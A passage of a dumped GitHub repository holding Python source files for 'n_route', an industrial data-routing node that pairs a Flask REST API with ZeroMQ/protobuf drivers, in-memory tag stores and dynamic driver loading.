LOG.error(ret)\n return False, str(err)\n\n\nclass ReadTopic(IReadTopic):\n def read_topic(self, topic):\n # 目前只支持对下行连续数据的读取\n try:\n if topic == 'all':\n # all主题\n data_list = m_core.m_store_seq_down.get_data_all()\n else:\n # 其它主题(按照tag进行过滤)\n data_list = []\n topic_info = m_core.m_cfg.get_topic_cfg()\n if topic in topic_info:\n index_list = []\n tags = topic_info.tags.split(',')\n for tag in tags:\n index_list.append(m_core.m_store_seq_down.get_index(tag))\n for index in index_list:\n data_list.append(m_core.m_store_seq_down.get_data(index))\n datas = []\n for data in data_list:\n datas.append(sensor2dict(data))\n return True, datas\n except Exception as err:\n return False, str(err)\n\n\nclass ReadTag(IReadTag):\n def read_tags(self, tags):\n # 目前只支持对下行连续数据的读取\n try:\n # 按照tag进行过滤\n data_list, index_list = [], []\n for tag in tags:\n index_list.append(m_core.m_store_seq_down.get_index(tag))\n for index in index_list:\n data = m_core.m_store_seq_down.get_data(index)\n data_list.append(sensor2dict(data))\n return True, data_list\n except Exception as err:\n return False, str(err)\n\n\nclass WriteTag(IWriteTag):\n def write_data(self, tag, value_double, value_int64, value_string, value_bytes, data_type, quality, timestamp):\n # 写入数据(目前只支持写入上行离散数据,即:反写控制)\n try:\n data = Data(tag, data_type, quality, timestamp, value_double=value_double, value_int64=value_int64,\n value_string=value_string, value_bytes=value_bytes.encode())\n m_core.m_store_dis_up.put_data(data)\n return True, '写入数据成功'\n except Exception as err:\n return False, str(err)\n\n\nclass FlushData(IFlushData):\n def flush_data(self):\n # 清空数据区(供运维使用)\n try:\n m_core.m_store_seq_down.clear()\n m_core.m_store_dis_down.clear()\n m_core.m_store_seq_up.clear()\n m_core.m_store_dis_up.clear()\n return True, '清除数据成功'\n except Exception as err:\n return False, str(err)\n\n\nclass State(IState):\n def get_state(self):\n # 获取节点状态\n try:\n node_state = {}\n # 节点自身状态\n node_state['run_state'] = 0\n data_state = {}\n # 节点数据区状态(目前只支持下行数据区状态)\n data_state['seq_max'] = m_core.basic_info.sequence_max\n data_state['seq_count'] = m_core.m_store_seq_down.get_data_len()\n data_state['dis_max'] = m_core.basic_info.discrete_max\n data_state['dis_count'] = m_core.m_store_dis_down.get_data_len()\n node_state['data_state'] = data_state\n node_state['driver_state'] = []\n # 驱动状态\n for driver_info in m_core.m_driver_dict.values():\n driver_state = {}\n driver_state['driver_name'] = driver_info.driver_name\n if driver_info.driver:\n ret = json.loads(driver_info.driver.get_state())\n driver_state['driver_state'] = ret['data']\n else:\n driver_state['driver_state'] = -1\n node_state['driver_state'].append(driver_state)\n node_state['topic_state'] = []\n # 主题数据状态\n data_topic_state = m_core.m_topic_data_dict\n for topic_info in data_topic_state.values():\n topic_state = {}\n topic_state['topic'] = topic_info.topic\n topic_state['count'] = topic_info.data_count\n topic_state['time'] = topic_info.last_time\n node_state['topic_state'].append(topic_state)\n return True, node_state\n except Exception as err:\n return False, str(err)\n\nif __name__ == \"__main__\":\n m_core = Core()\n m_core.my_main()\n basic_info = m_core.basic_info\n app = Flask(__name__)\n api = Api(app, version=basic_info.server_version, title=basic_info.server_name, description=basic_info.server_desc)\n api.add_resource(Version, '/' + basic_info.server_name + REST_VERSION)\n api.add_resource(Config, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_CONFIG)\n api.add_resource(ReadTopic, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_READ_TOPIC)\n api.add_resource(ReadTag, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_READ_TAG)\n api.add_resource(WriteTag, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_READ_TAG)\n api.add_resource(FlushData, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_FLUSH_DATA)\n api.add_resource(State, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_STATE)\n app.run(host=basic_info.local_ip, port=basic_info.local_port, debug=False)\n" }, { "alpha_fraction": 0.5730693936347961, "alphanum_fraction": 0.5821114182472229, "avg_line_length": 31.22834587097168, "blob_id": "e979dd9f9b1e5be38bfe54dfa58ff36418c84cb5", "content_id": "3860ed4afbc68ac3f3d218f3a1e272e333d75b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4196, "license_type": "no_license", "max_line_length": 115, "num_lines": 127, "path": "/n_route/app/interface.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!usr/bin/env python\n# -*- coding:utf-8 _*-\n\"\"\"\n@author:jiaruya\n@file: interface.py\n@time: 2019/01/22\n@desc:\n\"\"\"\nfrom flask import request\nfrom flask_restplus import Resource, reqparse\n\nCODE_SUCCESS = 1000\nCODE_PARAM_ERR = 1001\nCODE_CHECK_ERR = 1002\nCODE_OP_FAIL = 1003\n\nREST_VERSION = '/version' # 服务版本\nREST_CONFIG = '/config' # 服务配置\nREST_READ_TOPIC = '/data/topic' # 按照主题读取数据\nREST_READ_TAG = '/data/tag' # 按照测点读取数据\nREST_WRITE_TAG = '/data/tag' # 按照测点写入数据\nREST_FLUSH_DATA = '/data/flush' # 清空数据\nREST_STATE = '/state' # 获取状态\n\n\ndef make_http_ret(ret, msg):\n if ret:\n return {'data': msg, 'code': CODE_SUCCESS, 'msg': '操作成功'}, 200\n else:\n return {'data': msg, 'code': CODE_OP_FAIL, 'msg': '操作失败'}, 400\n\n\nclass IVersion(Resource):\n def get(self):\n ret, msg = self.get_version()\n return make_http_ret(ret, msg)\n\n def get_version(self):\n pass\n\n\nclass IConfig(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('cfg_name', type=str, required=True, location='args')\n args = parser.parse_args()\n ret, msg = self.get_config(args['cfg_name'])\n return make_http_ret(ret, msg)\n\n def post(self):\n req = request.json\n if req is None or 'cfg_name' not in req or 'cfg_msg' not in req:\n return {'data': '', 'code': CODE_PARAM_ERR, 'msg': '入参错误'}, REST_FAIL\n cfg_name = req['cfg_name']\n cfg_msg = req['cfg_msg']\n ret, msg = self.set_config(cfg_name, cfg_msg)\n return make_http_ret(ret, msg)\n\n def get_config(self, cfg_name):\n pass\n\n def set_config(self, cfg_name, cfg_msg):\n pass\n\n\nclass IReadTopic(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('topic', type=str, required=True, location='args')\n args = parser.parse_args()\n topic = args['topic']\n ret, msg = self.read_topic(topic)\n return make_http_ret(ret, msg)\n\n def read_topic(self, topic):\n pass\n\n\nclass IReadTag(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('tags', type=str, required=True, location='args')\n args = parser.parse_args()\n tags = args['tags'].split(',')\n ret, msg = self.read_tags(tags)\n return make_http_ret(ret, msg)\n\n def read_tags(self, tags):\n pass\n\n\nclass IWriteTag(Resource):\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('tag', type=str, required=True, location='json')\n parser.add_argument('value_double', type=float, required=True, location='json')\n parser.add_argument('value_int64', type=int, required=True, location='json')\n parser.add_argument('value_string', type=str, required=True, location='json')\n parser.add_argument('value_bytes', type=str, required=True, location='json')\n parser.add_argument('data_type', type=int, required=True, location='json')\n parser.add_argument('quality', type=int, required=True, location='json')\n parser.add_argument('timestamp', type=int, required=True, location='json')\n args = parser.parse_args()\n ret, msg = self.write_data(args['tag'], args['value_double'], args['value_int64'], args['value_string'],\n args['value_bytes'], args['data_type'], args['quality'], args['timestamp'])\n return make_http_ret(ret, msg)\n\n def write_data(self, tag, value_double, value_int64, value_string, value_bytes, data_type, quality, timestamp):\n pass\n\n\nclass IFlushData(Resource):\n def get(self):\n ret, msg = self.flush_data()\n return make_http_ret(ret, msg)\n\n def flush_data(self):\n pass\n\n\nclass IState(Resource):\n def get(self):\n ret, msg = self.get_state()\n return make_http_ret(ret, msg)\n\n def get_state(self):\n pass" }, { "alpha_fraction": 0.5035116076469421, "alphanum_fraction": 0.515667200088501, "avg_line_length": 22.88387107849121, "blob_id": "ac4483972277a6016c7a69661e3cd94af6cab39e", "content_id": "72cb2811c92603acf6417290fa0ecb49246b642c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3964, "license_type": "no_license", "max_line_length": 83, "num_lines": 155, "path": "/n_route/app/share.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: share.py\n@time: 2019/08/28\n@desc:\n\"\"\"\nimport json\nimport logging.config\n\nDEBUG = 1\n\n# 配置文件目录\nCFG_PATH = '../conf/'\n\n# 日志配置\nlogging.config.fileConfig(CFG_PATH + 'logger.conf')\nLOG = logging.getLogger('n_route')\n\n\n# -----------------API接口返回值--------------------\nRET_OK = json.dumps({'code': 0, 'data': '执行成功'})\nRET_FAIL_PARAM = json.dumps({'code': 1, 'data': '参数错误'})\nRET_FAIL_EXEC = json.dumps({'code': 2, 'data': '执行失败'})\n\n# -----------------数据模式--------------------\nData_Mode_Dict = {'seq_sensor': 0, 'seq_event': 1, 'dis_sensor': 2, 'dis_event': 3}\n\n# -----------------数据流向--------------------\nData_dir_Dict = {'up': 0, 'down': 1}\n\n# -----------------传感类数据类型--------------------\nData_Type_Dict = {'double': 0, 'int64': 1, 'string': 2, 'bytes': 3}\n\n\n# 传感类数据结构体\nclass Data:\n def __init__(self, tag, data_type, quality, timestamp,\n value_double=0.0,\n value_int64=0,\n value_string='',\n value_bytes=b''):\n # 标签点名称\n self.tag = tag\n # 值\n self.value_double = value_double\n self.value_int64 = value_int64\n self.value_string = value_string\n self.value_bytes = value_bytes\n # 数据类型\n self.data_type = data_type\n # 品质\n self.quality = quality\n # 时间戳\n self.timestamp = timestamp\n\n\n# 事件类数据结构体\nclass Event:\n def __init__(self, source, event_type, level, keyword, content, timestamp):\n # 事件源\n self.source = source\n # 事件类型\n self.event_type = event_type\n # 等级\n self.level = level\n # 摘要\n self.keyword = keyword\n # 内容\n self.content = content\n # 时间戳\n self.timestamp = timestamp\n\n\n# 加载python类库\ndef load_python(lib_name):\n try:\n lib = lib_name.split('.')[0]\n driver = __import__(lib)\n if hasattr(driver, 'DataDriver'):\n return driver.DataDriver()\n else:\n return None\n except ImportError as e:\n print(e)\n return None\n\n\n# 加载c#类库\ndef load_csharp(lib_name):\n try:\n import clr\n clr.FindAssembly(lib_name)\n\t\tclr.AddReference(lib_name.split('.')[0])\n from DataDriver import DataDriver\n return DataDriver()\n except Exception as e:\n print(e)\n return None\n\n\n# 读取配置文件\ndef load_config(file_name):\n try:\n file_name = CFG_PATH + file_name\n with open(file_name, 'r', encoding='UTF-8') as f:\n cfg_msg = json.loads(f.read())\n return cfg_msg\n except Exception:\n return {}\n\n\n# 传感类数据对象转字典\ndef sensor2dict(data):\n if data:\n return {'tag': data.tag,\n 'value_double': data.value_double,\n 'value_string': data.value_string,\n 'value_int64': data.value_int64,\n 'value_bytes': data.value_bytes.decode(),\n 'data_type': data.data_type,\n 'quality': data.quality,\n 'timestamp': data.timestamp}\n else:\n return {}\n\n\n# 事件类数据对象转字典\ndef event2dict(event):\n if event:\n return {'source': event.source,\n 'event_type': event.event_type,\n 'level': event.level,\n 'keyword': event.keyword,\n 'content': event.content,\n 'timestamp': event.timestamp}\n else:\n return {}\n\n\n# 检查API执行返回结果\ndef check_api_result(ret):\n try:\n ret_dict = json.loads(ret, encoding='utf-8')\n if ret_dict['code'] == 0:\n return True\n else:\n return False\n except:\n return False\n\n\nif __name__ == \"__main__\":\n load_csharp('s_opcda_client.dll')\n" }, { "alpha_fraction": 0.5191552639007568, "alphanum_fraction": 0.5256288051605225, "avg_line_length": 30.938983917236328, "blob_id": "9814a282125fdfebdcc752ab4e7b6819aaf5288b", "content_id": "0da25498733e9e410d0f055a31ef36c1f751b527", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10543, "license_type": "no_license", "max_line_length": 117, "num_lines": 295, "path": "/n_route/app/driver_zmq.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: driver_zmq.py\n@time: 2019/09/01\n@desc:\n\"\"\"\nimport zmq\nimport json\nimport time\nimport logging\nimport threading\nfrom share import Data, Event\nfrom share import RET_OK, RET_FAIL_PARAM, RET_FAIL_EXEC\nimport sensor_list_pb2\nimport event_list_pb2\n\n\n# 日志\nLOG = logging.getLogger('driver_zmq')\n# 驱动版本号\ndriver_version = 'v1.0'\n# 驱动名称\ndriver_name = 'driver_zmq.py'\n# 驱动描述\ndriver_desc = 'zmq驱动程序v1.0版本(20190917)'\n\n\n# zmq初始化环境\ncontext = zmq.Context()\n\n\nclass DataDriver:\n # 订阅配置\n class SubCfg:\n def __init__(self, host, port, topic):\n # 客户端IP地址\n self.host = host\n # 客户端端口号\n self.port = port\n # 客户端订阅主题\n self.topic = topic\n\n def __init__(self):\n # 订阅socket\n self.__sub_socket = context.socket(zmq.SUB)\n # 发布socket\n self.__pub_socket = context.socket(zmq.PUB)\n # 回调函数\n self.__call_back = None\n # 采集线程运行标识\n self.__running = False\n # 本地IP地址\n self.__host = ''\n # 本地端口号\n self.__port = 0\n # 数据模式:sensor(传感类数据);event(事件类数据)\n self.__model = ''\n # 订阅数组\n self.__sub_topics_dict = {}\n # 组装数据函数字典\n self.__package = {'sensor': self.__package_sensor_data, 'event': self.__package_event_data}\n # 解析数据函数字典\n self.__un_package = {'sensor': self.__un_package_sensor_data, 'event': self.__un_package_event_data}\n\n # 获取版本信息\n def get_version(self):\n return json.dumps({'code': 0, 'data': {'version': driver_version, 'name': driver_name, 'desc': driver_desc}})\n\n # 设置基础配置\n def set_basic_config(self, cfg_name, cfg_msg):\n # 解析配置\n try:\n cfg = json.loads(cfg_msg, encoding='utf-8')\n self.__host = cfg['host']\n self.__port = cfg['port']\n self.__model = cfg['model']\n except Exception as err:\n LOG.error('设置基础配置失败:%s' % (err,))\n return RET_FAIL_PARAM\n # 校验配置\n if self.__model not in self.__package.keys():\n LOG.error('数据模式设置错误:%s' % (self.__model,))\n return RET_FAIL_EXEC\n # 设置基础配置成功\n LOG.info('设置基础配置成功')\n return RET_OK\n\n # 设置运行时配置\n def set_run_config(self, cfg_name, cfg_msg):\n try:\n # 临时变量,保存订阅主题\n cfg_sub_dict = {}\n # 配置所有的订阅信息\n cfg_list = json.loads(cfg_msg, encoding='utf-8')\n for cfg in cfg_list:\n host, port, topic = cfg['host'], cfg['port'], cfg['topic']\n # 组建订阅主题\n sub_key = self.__make_topic(host, port, topic)\n # 添加到临时订阅列表\n cfg_sub_dict[sub_key] = self.SubCfg(host, port, sub_key)\n except Exception as err:\n LOG.error('设置运行配置失败:%s' % (str(err),))\n return RET_FAIL_PARAM\n # 动态更新订阅配置\n if not self.__alter_topic(cfg_sub_dict):\n return RET_FAIL_EXEC\n # 设置运行配置成功\n LOG.info('设置运行配置成功')\n return RET_OK\n\n # 初始化\n def init(self):\n try:\n # 创建zmq服务端\n self.__pub_socket.bind('tcp://%s:%d' % (self.__host, self.__port))\n # 创建订阅线程\n thread_sub = threading.Thread(target=self.__run)\n thread_sub.start()\n LOG.info('创建zmq服务端成功:%s:%d' % (self.__host, self.__port))\n except Exception as err:\n LOG.error('创建zmq服务端失败: %s' % (str(err),))\n return RET_FAIL_EXEC\n # 初始化成功\n LOG.info('驱动初始化成功。创建zmq服务端:%s:%d' % (self.__host, self.__port))\n return RET_OK\n\n # 设置回调函数\n def set_fun(self, fun):\n self.__call_back = fun\n # 设置回调函数成功\n LOG.info('设置回调函数成功')\n return RET_OK\n\n # 写入数据(对外发布数据)\n def write_data(self, data_info, data_list):\n # 解析data_info里的topic\n info = json.loads(data_info, encoding='utf-8')\n # 组建发送标识topic\n topic = self.__make_topic(self.__host, self.__port, info['topic'])\n try:\n # 组装数据\n message = self.__package_data(data_list)\n except Exception as err:\n LOG.error('组装数据:%s' % (str(err),))\n return RET_FAIL_EXEC\n try:\n # 发送数据\n self.__pub_socket.send(topic.encode('utf-8') + message)\n except Exception as err:\n LOG.error('发布数据失败:%s' % (str(err),))\n return RET_FAIL_EXEC\n # 写入数据成功\n LOG.debug('%s主题发布%d条数据' % (str(topic), len(data_list)))\n return RET_OK\n\n # 启动运行\n def run(self):\n self.__running = True\n # 启动运行成功\n LOG.info('驱动启动成功')\n return RET_OK\n\n # 停止运行\n def stop(self):\n self.__running = False\n # 停止采集成功\n LOG.info('驱动停止成功')\n return RET_OK\n\n # 获取状态\n def get_state(self):\n if self.__running:\n state = 0x00000000\n else:\n state = 0x00010000\n return json.dumps({'code': 0, 'data': state})\n\n # ------------------------------内部实现--------------------------------\n\n # 组建topic(host:port:topic^)\n def __make_topic(self, host, port, topic):\n result = ':'.join((host, str(port), topic)) + '^'\n return result\n\n # 建立zmq订阅连接,设置订阅主题\n def __connect(self, host, port, topic):\n self.__sub_socket.connect('tcp://%s:%d' % (host, port))\n self.__sub_socket.setsockopt(zmq.SUBSCRIBE, topic.encode())\n\n # 删除订阅主题\n def __dis_connect(self, topic):\n self.__sub_socket.setsockopt(zmq.UNSUBSCRIBE, topic.encode())\n\n # 动态更新主题\n def __alter_topic(self, cfg_sub_dict):\n try:\n for sub_key, sub_info in cfg_sub_dict.items():\n # 检查是否为新增订阅\n if sub_key not in self.__sub_topics_dict:\n # 新增订阅\n self.__connect(sub_info.host, sub_info.port, sub_info.topic)\n # 设置订阅主题\n self.__sub_topics_dict[sub_key] = sub_info\n LOG.info('新增订阅主题:%s' % (sub_info.topic,))\n # 差值计算,查找要删除的订阅\n del_keys = list(set(self.__sub_topics_dict.keys()).difference(set(cfg_sub_dict.keys())))\n for key in del_keys:\n # 退订\n self.__dis_connect(cfg_sub_dict[key].topic)\n # 删除对应主题\n self.__sub_topics_dict.pop(key)\n LOG.info('删除订阅主题:%s' % (cfg_sub_dict[key].topic,))\n return True\n except Exception as err:\n LOG.error('更新主题配置失败: %s' % (str(err),))\n return False\n\n # 主运行函数\n def __run(self):\n while True:\n if self.__running:\n # 接收数据\n message = self.__sub_socket.recv()\n topic, message = message.split(b'^')\n # 解析数据\n data_list = self.__parse_data(message)\n # 组装data_info\n data_info = json.dumps({'topic': topic.decode()})\n LOG.debug('接收数据:%s, 长度:%d' % (str(data_info), len(data_list)))\n # 执行回调函数,反馈采集结果\n self.__call_back(data_info, data_list)\n else:\n time.sleep(1)\n\n # 组装数据\n def __package_data(self, data_list):\n return self.__package[self.__model](data_list)\n\n # 解析数据\n def __parse_data(self, message):\n return self.__un_package[self.__model](message)\n\n # 组装传感类数据\n def __package_sensor_data(self, data_list):\n sensor_list = sensor_list_pb2.sensor_list()\n for data in data_list:\n sensor = sensor_list.sensors.add()\n sensor.tag = data.tag\n sensor.value_double = data.value_double\n sensor.value_int64 = data.value_int64\n sensor.value_string = data.value_string\n sensor.value_bytes = data.value_bytes\n sensor.data_type = data.data_type\n sensor.quality = data.quality\n sensor.timestamp = data.timestamp\n return sensor_list.SerializeToString()\n\n # 解析传感类数据\n def __un_package_sensor_data(self, msg_data):\n data_list = []\n sensors_list = sensor_list_pb2.sensor_list()\n sensors_list.ParseFromString(msg_data)\n for sensor in sensors_list.sensors:\n data = Data(sensor.tag, sensor.data_type, sensor.quality, sensor.timestamp,\n value_double=sensor.value_double,\n value_int64=sensor.value_int64,\n value_string=sensor.value_string,\n value_bytes=sensor.value_bytes)\n data_list.append(data)\n return data_list\n\n # 组装事件类数据\n def __package_event_data(self, data_list):\n event_list = event_list_pb2.event_list()\n for data in data_list:\n event = event_list.sensors.add()\n event.source = data.source\n event.event_type = data.event_type\n event.level = data.level\n event.keyword = data.keyword\n event.content = data.content\n event.timestamp = data.timestamp\n return event_list.SerializeToString()\n\n # 解析事件类数据\n def __un_package_event_data(self, msg_data):\n data_list = []\n event_list = event_list_pb2.event_list()\n event_list.ParseFromString(msg_data)\n for event in event_list.events:\n data = Event(event.source, event.event_type, event.level, event.keyword, event.content, event.timestamp)\n data_list.append(data)\n return data_list\n\n" }, { "alpha_fraction": 0.5276816487312317, "alphanum_fraction": 0.5346021056175232, "avg_line_length": 22.581632614135742, "blob_id": "23cefc2177e5b1e552b4784724013c7485a0013d", "content_id": "037b26dba50415501bf7d49178100a506559846e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2606, "license_type": "no_license", "max_line_length": 67, "num_lines": 98, "path": "/n_route/app/store.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: store.py\n@time: 2019/08/28\n@desc:数据缓存区\n\"\"\"\nimport queue\n\n\n# 连续数据\nclass Sequence:\n def __init__(self, max_length):\n # 连续数据:数组\n self.__series_list = []\n # 数据索引字典\n self.__tag_index_dict = {}\n # 数据长度\n self.__data_count = -1\n # 最大数组个数\n self.__max_length = max_length\n\n # 写入单个数据\n def put_data(self, key, data):\n try:\n index = self.__tag_index_dict[key]\n self.__series_list[index] = data\n except:\n index = len(self.__series_list)\n # 当数据量大于设置的最大数据量时,写入失败\n if index > self.__max_length:\n return -1\n self.__series_list.append(data)\n self.__tag_index_dict[key] = index\n self.__data_count = index + 1\n return index\n\n # 根据标签点名称集合获取索引位置集合\n def get_index(self, key):\n if key in self.__tag_index_dict:\n return self.__tag_index_dict[key]\n return -1\n\n # 读取单个数据(按照索引)\n def get_data(self, index):\n if index < 0 or index >= self.__data_count:\n return None\n return self.__series_list[index]\n\n # 读取全部数据\n def get_data_all(self):\n return self.__series_list\n\n # 获取数据长度\n def get_data_len(self):\n return self.__data_count\n\n # 清空数据\n def clear(self):\n self.__series_list.clear()\n self.__data_count = 0\n\n\n# 离散数据\nclass Discrete:\n def __init__(self, max_length):\n # 最大数据个数\n self.__max_length = max_length\n # 离散数据队列\n self.__discrete_queue = queue.Queue(self.__max_length)\n\n # 写入单个数据\n def put_data(self, data):\n self.__discrete_queue.put(data, block=True)\n\n # 读取单个数据\n def get_data(self):\n try:\n return self.__discrete_queue.get(block=True, timeout=5)\n except Exception:\n return None\n\n # 读取全部数据\n def get_data_all(self):\n data_list = []\n while not self.__discrete_queue.empty():\n data_list.append(self.__discrete_queue.get())\n return data_list\n\n # 获取数据长度\n def get_data_len(self):\n return self.__discrete_queue.qsize()\n\n # 清空数据\n def clear(self):\n while not self.__discrete_queue.empty():\n self.__discrete_queue.get()\n\n" }, { "alpha_fraction": 0.541863739490509, "alphanum_fraction": 0.5455692410469055, "avg_line_length": 37.20481872558594, "blob_id": "57fc69e8dfa6a410cd9cffc69add105034b227f5", "content_id": "5ab1b9ca91d87ea4cabf9fdeef6574f4880c62de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14278, "license_type": "no_license", "max_line_length": 123, "num_lines": 332, "path": "/n_route/app/core.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: core.py\n@time: 2019/09/09\n@desc:\n\"\"\"\nimport json\nimport time\nfrom pump import PubSeq, PubDis\nfrom share import Data\nfrom store import Sequence, Discrete\nfrom cfg import Cfg\nfrom share import LOG, DEBUG\nfrom share import load_python, load_csharp, load_config, check_api_result\n\n\nclass Core:\n class TopicDataInfo:\n def __init__(self, topic, data_count, last_time):\n self.topic = topic\n self.data_count = data_count\n self.last_time = last_time\n\n def __init__(self):\n # 配置\n self.m_cfg = Cfg()\n # 基础配置\n self.m_cfg.load_cfg('basic.json')\n self.basic_info = self.m_cfg.get_basic_cfg()\n # 下行连续数据区\n self.m_store_seq_down = Sequence(self.basic_info.sequence_max)\n # 下行离散数据区\n self.m_store_dis_down = Discrete(self.basic_info.discrete_max)\n # 上行连续数据区\n self.m_store_seq_up = Sequence(self.basic_info.sequence_max)\n # 上行离散数据区\n self.m_store_dis_up = Discrete(self.basic_info.discrete_max)\n # 上行连续发布泵(关联下行连续数据区)\n self.m_pump_seq_up = PubSeq(self.m_store_seq_down)\n # 上行离散发布泵(关联下行离散数据区)\n self.m_pump_dis_up = PubDis(self.m_store_dis_down)\n # 下行连续发布泵(关联上行连续数据区)\n self.m_pump_seq_down = PubSeq(self.m_store_seq_up)\n # 下行离散发布泵(关联上行离散数据区)\n self.m_pump_dis_down = PubDis(self.m_store_dis_up)\n # 驱动字典\n self.m_driver_dict = {}\n # 主题字典\n self.m_topic_dict = {}\n # 主题数据字典\n self.m_topic_data_dict = {}\n\n # 加载配置\n def load_cfg(self, file_name):\n self.m_cfg.load_cfg(file_name)\n\n # 加载驱动\n def load_driver(self):\n self.m_driver_dict = self.m_cfg.get_driver_cfg()\n for driver_info in self.m_driver_dict.values():\n # 加载驱动对象\n if driver_info.lib_type == 'python':\n # python版本的驱动\n driver = load_python(driver_info.lib_name)\n elif driver_info.lib_type == 'csharp':\n # C#版本的驱动\n driver = load_csharp(driver_info.driver_name)\n else:\n # 其它语言版本的驱动暂不支持(待扩充)\n driver = None\n LOG.error('不支持的库类型:%s' % (driver_info.lib_type,))\n if driver:\n driver_info.driver = driver\n LOG.info('加载驱动成功:%s' % (driver_info.driver_name,))\n else:\n LOG.error('加载驱动失败:%s' % (driver_info.driver_name,))\n\n # 加载主题\n def load_topic(self):\n self.m_topic_dict = self.m_cfg.get_topic_cfg()\n\n # 初始化驱动\n def init_driver(self):\n # 遍历驱动字典\n for driver_info in self.m_driver_dict.values():\n if not driver_info.driver:\n LOG.error('驱动%s未加载' % (driver_info.driver_name,))\n continue\n # 1.设置驱动基础配置\n if not self.__driver_set_basic_config(driver_info):\n continue\n # 2.设置驱动运行配置\n if not self.__driver_set_run_config(driver_info):\n continue\n # 3.驱动初始化操作\n ret = driver_info.driver.init()\n if check_api_result(ret):\n LOG.info('驱动 %s 初始化成功' % driver_info.driver_name)\n else:\n LOG.error('驱动 %s 初始化失败' % driver_info.driver_name)\n continue\n # 4.设置回调函数\n if not self.__driver_set_call_back(driver_info):\n continue\n # 5.启动驱动\n ret = driver_info.driver.run()\n if check_api_result(ret):\n LOG.info('启动 %s 成功' % driver_info.driver_name)\n else:\n LOG.error('启动 %s 失败' % driver_info.driver_name)\n continue\n\n # 加载发布泵\n def load_pump(self):\n pumbs_cfg = self.m_cfg.get_pump_cfg()\n # 遍历发布泵配置\n for pump_info in pumbs_cfg:\n # 主题配置信息\n if pump_info.topic not in self.m_topic_dict:\n LOG.error('%s 主题未配置' % (pump_info.topic,))\n continue\n topic_info = self.m_topic_dict[pump_info.topic]\n # 驱动配置信息\n if pump_info.driver not in self.m_driver_dict:\n LOG.error('%s 驱动未配置' % (pump_info.driver,))\n continue\n driver_info = self.m_driver_dict[pump_info.driver]\n # 关联发布泵:pump,driver,topic,cycle\n if self.__pump_set_config(driver_info, topic_info, pump_info.cycle):\n LOG.info('关联发布泵成功:%s:%s:%d' % (driver_info.driver_name, topic_info.topic, pump_info.cycle))\n else:\n continue\n\n # 设置运行时配置\n def set_run_config(self, cfg_name, cfg_msg):\n for driver_info in self.m_driver_dict.values():\n # 查找到对应的驱动\n if driver_info.config['cfg'] == cfg_name:\n # 设置驱动运行时配置\n return self.__driver_set_run_config(driver_info)\n return False\n\n # 主进行函数\n def my_main(self):\n # 加载驱动\n self.load_driver()\n # 加载主题\n self.load_topic()\n # 初始化驱动\n self.init_driver()\n # 加载发布泵\n self.load_pump()\n if DEBUG:\n self.__test()\n\n # -----------------内部函数---------------------\n\n # 写入下行连续数据区\n def __write_data_seq_sensor_down(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_seq_down.put_data(data.tag, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入下行连续数据区\n def __write_data_seq_event_down(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n key = data.source + data.keyword\n self.m_store_seq_down.put_data(key, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入下行离散数据区\n def __write_data_dis_down(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_dis_down.put_data(data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入上行连续数据区\n def __write_data_seq_sensor_up(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_seq_up.put_data(data.tag, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入上行连续数据区\n def __write_data_seq_event_up(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n key = data.source + data.keyword\n self.m_store_seq_up.put_data(key, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入上行离散数据区\n def __write_data_dis_up(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_dis_up.put_data(data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 保存主题数据状态\n def __save_data_info(self, data_info, data_len):\n data_info = json.loads(data_info)\n if 'topic' in data_info and len(data_info['topic']) > 0:\n # 保存当前主题对应的数据信息(主题、个数、最后更新时间)\n self.m_topic_data_dict[data_info['topic']] = self.TopicDataInfo(data_info['topic'], data_len, int(time.time()))\n else:\n # 默认主题(主题、个数、最后更新时间)\n topic = 'all'\n self.m_topic_data_dict[topic] = self.TopicDataInfo(topic, data_len, int(time.time()))\n\n # 驱动设置基础配置\n def __driver_set_basic_config(self, driver_info):\n if driver_info.basic_config:\n ret = driver_info.driver.set_basic_config(driver_info.basic_config,\n json.dumps(load_config(driver_info.basic_config)))\n if not check_api_result(ret):\n LOG.error('驱动 %s 设置基础配置失败' % driver_info.driver_name)\n return False\n 